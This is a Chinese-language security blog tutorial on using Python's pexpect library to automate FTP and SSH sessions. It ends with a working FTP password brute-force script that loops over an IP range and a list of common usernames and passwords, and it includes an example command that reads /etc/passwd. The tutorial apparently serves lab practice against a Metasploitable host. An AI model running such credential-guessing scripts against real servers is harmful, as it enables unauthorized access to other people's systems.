python使用pexpect實現ftp的操作
本文作者:hell0_w
砸個廣告:各位在網路安全方面有新創作的小夥伴,快將你們的心得砸過來吧~
文章以word形式發至郵箱:
minwei.wang@dbappsecurity.com.cn
有償投稿,記得留下你的姓名和聯繫方式哦~
先來介紹一下pexpect,pexpect可以理解為Linux下expect(不知道的可以百度下linux expect)的python封裝。通過pexpect可以實現對ssh、ftp、passwd、telnet等命令進行自動交互,而無需人工干涉來達到自動化的目的。比如我們可以模擬一個FTP登錄時的所有交互,包括輸入主機地址、用戶名、密碼,還有對文件上傳下載操作等等,若出現異常,我們也可以進行自動化處理。
Pexpect的安裝
可以使用pip安裝
pip install pexpect
也可以使用easy_install
easy_install pexpect
本菜雞在win7下使用pip安裝的時候拋出好多異常,簡直闊怕(後來發現是我的疏忽,我py2和py3同存的問題)無奈只能通過下載模塊之後本地安裝。
下載地址:
https://pypi.python.org/pypi/pexpect/
適用於py2和py3
下載完成之後找到對應路徑直接使用pip安裝即可
後來遇到個坑,發現windows下不支持pexpect,只好改換linux
一個簡單的ftp登錄腳本
#coding:utf-8
import pexpect
ftp = pexpect.spawn("ftp 192.168.112.129") #spawn啟動ftp程序
ftp.expect("Name") #expect方法等待子程序產生的輸出,判斷是否匹配定義的字元串Name
ftp.sendline("anonymous") #匹配後發送用戶名字元串進行回應
ftp.expect("Password:")
ftp.sendline("anonymous")
ftp.sendline("pwd")
ftp.interact() #執行完成後保持交互狀態,把控制權交給控制台
運行結果:
pexpect組件簡介
1. spawn類
spanw是pexpect的主要介面,功能就是啟動和控制子應用程序。spawn()中可以是系統中的命令,但是不會解析shell命令中的元字元,包括重定向「>」,管道符「|」或者通配符「*」,但是我們可以將含有這三個特殊元字元的命令作為/bin/bash的參數進行調用,例如:
she = pexpect.spawn(『/bin/bash –c 「cat /etc/passwd | grep root > log.txt」』)
she.expect(pexpect.EOF)
spawn支持使用python列表來代替參數項,比如上述命令可變為:
command = 『cat /etc/passwd | grep root > log.txt』
she = pexpect.spawn(『/bin/bash』,[『-c』,command])
she.expect(pexpect.EOF)
(1)expect方法:expect定義了子程序輸出的匹配規則。也可使用列表進行匹配,返回值是一個下標值,如果列表中有多個元素被匹配,則返回的是最先出現的字元的下標值。
如上邊的腳本中ftp.expect("Name"),返回值為0
列表的情況如下圖,返回值為2
(2)read方法:向子程序發送響應命令,可以理解為代替了我們的鍵盤輸入。
例如:
send(self,s) 發送命令,不回車
sendline(self,s=』』) 發送命令,回車
sendcontrol(self,char) 發送控制字元test.sendcontrol(『c』)等價於「ctrl+c」
sendeof() 發送eof
2. run函數
run是使用pexpect進行封裝的調用外部命令的函數,類似於os.system()或os.popen()方法,不同的是,使用run可以同時獲得命令的輸出結果及其命令的退出狀態。
pexpect.run("sshxxx@x.x.x.x",events={"password:":"xxx"})
events是個字典
3. pxssh類
pxssh是pexpect的派生類,常用的方法有:
login() 建立ssh連接
logout() 斷開連接
prompt() 等待系統提示符,用於等待命令執行結束。
一個簡單的ssh登錄互動式腳本
#coding:utf-8
import pxssh
hostname = "192.168.112.129"
username = "msfadmin"
password = "msfadmin"
try:
ssh = pxssh.pxssh()
ssh.login(hostname,username,password)
ssh.sendline("whoami")
ssh.prompt() #匹配系統提示符
print ssh.before #列印系統提示符前的輸出
except pxssh.ExceptionPxssh,e:
print "登錄失敗"
print str(e)
編寫實現ftp服務狀態測試以及登錄口令破解功能
(腳本文檔點擊閱讀原文獲取,提取碼:7m0a)
#coding:utf-8
import pexpect
def ftp_connect(ip,username,password):
try:
ftp = pexpect.spawn("ftp " + ip,timeout=0.15) #設置超時時間為0.15s
ftp.expect("Name")
print ip + " Ftp service is opening"
ftp.sendline(username)
print ftp.before
print "testing username: " + username
ftp.expect("Password:")
ftp.sendline(password)
print "testing password: " + password
ftp.expect("Login successful")
print "[+]successfully! username is " + username
print "[+]successfully! password is " + password
ftp.sendline("bye")
ftp.close()
return message
except Exception,e:
print "[-]error!"
def ip():
ip_list = []
ip = "192.168.112."
for i in xrange(128,130):
ip += str(i)
ip_list.append(ip)
ip = "192.168.112."
return ip_list
def payloads_list():
ip_list = ip()
username_list = ["root","admin","msfadmin","anonymous","ftpuser"]
password_list = ["password","123456","msfadmin"]
payload = []
payloads = []
for a in ip_list:
for b in username_list:
for c in password_list:
payload.append(a)
payload.append(b)
payload.append(c) #把所需參數加入payload中
for i in range(0,len(payload),3):
payloads.append(payload[i:i+3]) #將payload切割,生成一一對應的參數放入新的列表中
return payloads
def attack():
payloads = payloads_list()
for i in range(len(payloads)):
ftp_connect(payloads[i][0],payloads[i][1],payloads[i][2])
if __name__ == "__main__":
attack()
腳本運行結果(部分結果):
這也算是個多功能腳本吧,測試ssh的時候,只需替換相應的代碼即可。當然不比其他工具,算是個練習吧,練習編寫腳本的能力。
-END-